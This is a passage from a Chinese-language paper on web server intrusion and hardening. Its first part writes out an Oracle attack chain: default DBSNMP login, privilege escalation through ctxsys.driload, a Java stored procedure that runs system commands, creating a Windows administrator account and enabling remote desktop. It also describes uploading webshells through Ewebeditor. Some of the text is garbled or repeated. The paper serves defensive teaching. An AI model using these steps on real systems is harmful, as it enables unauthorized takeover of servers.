接着安装个ORACLE的客户端,使用Sqlplus连接服务器,格式sqlplus DBSNMP/DBSNMP@//202.98.123.79:1521/china成功登陆,执行select*from user_role_privs;可以看出当前用户只具有CONNECT权限。利用Oracle本地PL/SQL漏洞进行权限提升,成功提升为DBA权限,命令如下:

SQL>Exec ctxsys.driload.validate_stmt('grant dba to dbsnmp');

最后借用Oracle支持的Java特性,创建可以执行系统命令的存储过程,增加管理员账号(Windows平台的Oracle默认以system账号运行,所以我们执行的命令也是以system账号权限执行),下面创建一个JAVA源程序,以便执行系统命令。创建名为”util”的JAVA程序的主体代码如下:public static int RunThis(String args){Runtime rt=Runtime.getRuntime();int RC=-1;try{Process p=rt.exec(args);int bufSize=4096;

存储过程如下:create or replace function run_cmz(p_cmd in varchar2)return number as language java name'util.RunThis(java.lang String)return integer';执行存储命令exec:x:=run_cmz('cmd/c ver');exec:x:=run_cmz('cmd/c'net user ceshi 98765321/add');exec:x=run_cmz('cmd/c'net localgroup administrators ceshi/add');这样就可以添加了windows 2003系统用户,并提升到超级管理员的权限。如要开启远程计算机3389服务,只要执行如下命令:

exec:x:=run_cmz('cmd/c'REG ADD HKLMSYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp/v EnableWinStation/t REG_DWORD/d 1');

1.3 上传漏洞的利用

这种技术方式是利用网站的上传功能来上传木马,正常来说,ASP/PHP/JSP为后缀的文件在网站是不允许上传,但是黑客会攻破这道防护,采取其它技术来上传ASP/PHP/JSP木马,获得服务器的WEBSHELL权限。如Ewebeditor组件在JSP/ASP/PHP开发起到很大作用,但却带来很大的安全隐患,它常被用作上传木马的手段。如JSP网站服务器,通过Ewebeditor可上传abc.jsp文件到服务器,abc.jsp文件代码如下:

这样就可以添加了windows 2003系统用户,并提升到超级管理员的权限。如要开启远程计算机3389服务。

2 服务器安全防护---应对策略

2.1 架构安全的Web服务器

目前,比较主流的操作系统是Windows2003系统,但因其自身存在着许多系统漏涧及安全隐患,如何对服务器进行安全检测和安全配置显得十分重要。

1)安装操作系统时要选择NTFS文件格式,装完操作系统要杀毒软件。

2)安装系统补丁。扫描漏洞全面杀毒;删除Windows Server 2003默认共享,命令如下:

3)禁用IPC连接

在命令行输入如下命令即可进行连接:net use目标ipipc$"password"/user:"usernqme"。我们可以通过修改注册表来禁用IPC连接。打开注册表编辑器。找到如下组建HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa中的restrictanonymous子键,将其值改为1即可禁用IPC连接。

4)删除"网络连接"里的协议和服务

在"网络连接"里,把不需要的协议和服务都删掉,这里只安装了基本的Internet协议(TCP/IP),同时在高级tcp/ip设置里--"NetBIOS"设置"禁用tcp/IP上的NetBIOS(S)"。

5)启用windows连接防火墙,只开放web服务(80端口)。

windows连接防火墙可以有效地拦截对Windows 2003服务器的非法入侵,防止非法远程主机对服务器的扫描,从而提高Windows 2003服务器的安全性。同时,它也可以有效拦截利用操作系统漏洞进行端口攻击的病毒,如冲击波等蠕虫病毒。如果在用Windows 2003构造的虚拟路由器上启用此防火墙功能,能够对整个内部网络起到很好的保护作用,因此我们只开放web服务器常用端口,如80端口。

2.2 构建数据库及程序的安全体系

1)预防ACCESS数据库下载。把ACCESS数据库的扩展名mdb改为asp/php,通过这种方式来解决ACCESS数据库被识别下载。

2)防SQL注入攻击。从程序的本身着手,对于用户输入的数据不能直接传参,最有效的方法还是通过存储过程来防止SQL注入。

3)强化数据库密码的强度,防止数据库的密码泄露,定期修改数据库密码,保证数据库密码的安全。

3 结束语

随着网络飞速发展及B/S服务业务的广泛应用,服务器的安全问题是不可忽略的,防护与入侵这一对矛盾是永远存在的。本文结合工作实际,分析了Web服务器的入侵方式,给出了服务器安全防护的应对策略。

参考文献

[1]徐玉国,韩兆君.Web应用程序中的数据库安全策略[J].电脑知识与技术,2007(1):23.

[2]寂寞的刺猬.上传漏洞的形成[J].黑客防线,2006(4):19-22.